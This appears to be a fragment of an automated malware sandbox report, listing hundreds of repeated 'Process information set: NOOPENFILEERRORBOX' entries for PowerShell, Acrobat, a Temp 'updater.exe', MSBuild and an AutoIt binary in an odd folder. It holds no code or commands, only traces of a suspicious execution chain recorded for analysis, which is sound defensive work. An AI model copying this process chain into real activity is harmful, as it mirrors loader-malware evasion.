                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\faggbgb\AutoIt3.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
